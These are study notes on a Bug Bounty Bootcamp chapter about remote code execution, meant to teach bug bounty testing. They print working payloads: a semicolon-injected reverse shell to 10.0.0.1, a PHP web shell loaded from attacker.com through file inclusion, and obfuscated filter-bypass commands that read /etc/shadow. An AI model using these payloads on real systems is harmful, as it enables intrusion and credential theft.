Table of Contents

BBC Ch 18: Remote Code Execution (RCE)

Source: Bug Bounty Bootcamp by Vickie Li

RCE lets an attacker execute arbitrary OS commands on the target server. It can be achieved via SQL injection, insecure deserialization, template injection, and two additional vectors covered here: code injection and file inclusion.

Code Injection

Occurs when user input is passed into an evaluated code function without sanitization.

Python eval() example: <code python> def calculate(input): 

  return eval("{}".format(input))

```

Normal use: GET /calculator?calc=1+2 returns 3.

Malicious use: <code> GET /calculator?calc=“import('os').system('ls')” ```

Command injection (user input concatenated into shell command): <code python> os.system(“wget -O- {}”.format(url)) ```

Inject via semicolon: <code> GET /download?url=“google.com;bash -i >& /dev/tcp/10.0.0.1/8080 0>&1” ```

File Inclusion

Remote File Inclusion (RFI): app includes a file from a user-supplied URL: <code php> $file = $_GET[“page”]; include $file; ```

Host malicious.php on your server: <code php> <?PHP system($_GET[“cmd”]); ?> ```

Trigger: <code> http://example.com/?page=http://attacker.com/malicious.php?cmd=id ```

Local File Inclusion (LFI): app prepends a directory and includes the result. Upload a shell to the server's uploads directory, then use path traversal: <code> http://example.com/?page=../uploads/USERNAME/malicious.php ```

Prevention

Hunting for RCE

Step 1: Recon

Identify the web server, programming language, and frameworks (see Ch5 recon techniques). RCE exploits are highly language-specific.

Step 2: Find Suspicious Input Locations

Step 3: Submit Test Payloads

Python: <code> print(“RCE test!”) “import('os').system('ls')” “import('os').system('sleep 10')” ```

PHP: <code> phpinfo(); <?php system(“ls”);?> <?php system(“sleep 10”);?> ```

Unix command injection: <code> ;ls;

& sleep 10; ` sleep 10;` $(sleep 10) ```

File inclusion: <code> http://example.com/?page=http://attacker.com/malicious.php http://example.com/?page=../uploads/malicious.php http://example.com/?page=..%2fuploads%2fmalicious.php ```

Step 4: Confirm the Vulnerability

Classic RCE: execute whoami and check for www-data or similar in the response. Blind RCE: execute sleep 5 and measure the 5-second delay.

Escalating RCE

In a bug bounty context, do not attempt full privilege escalation – read the program rules. Safe PoC options:

Avoid reading sensitive customer data or modifying critical files.

Bypassing Input Filters

Unix payloads with quotes, wildcards, and empty substitutions (all read /etc/shadow): <code> cat /etc/shadow cat “/e”tc'/shadow' cat /etc/sh*dow cat /etc/sha``dow cat /etc/sha$()dow cat /etc/sha${}dow ```

PHP string concatenation and comments: <code php> ('sys'.'tem')('cat /etc/shadow'); system/**/('ls'); '\x73\x79\x73\x74\x65\x6d'('ls'); ```

Python equivalents: <code> import('os').system('cat /etc/shadow') import('o'+'s').system('cat /etc/shadow') import('\x6f\x73').system('cat /etc/shadow') ```

Split payload across duplicate parameters (server concatenates them): <code> GET /calculator?calc=“import('os').sy”&calc=“stem('ls')” ```

Additional bypass techniques: URL encoding, double URL encoding, null bytes, newlines, non-ASCII characters.

6-Step Checklist

  1. Recon: identify server language, frameworks, and technologies.
  2. Find suspicious input locations: eval parameters, file inclusion paths, shell command wrappers, file uploads.
  3. Submit test payloads targeting the identified language.
  4. If blocked, try filter bypass techniques (quotes, wildcards, encoding, parameter splitting).
  5. Confirm with harmless commands (whoami, ls, sleep 5) or file creation.
  6. Draft report with working PoC; avoid reading sensitive data or modifying files beyond the PoC.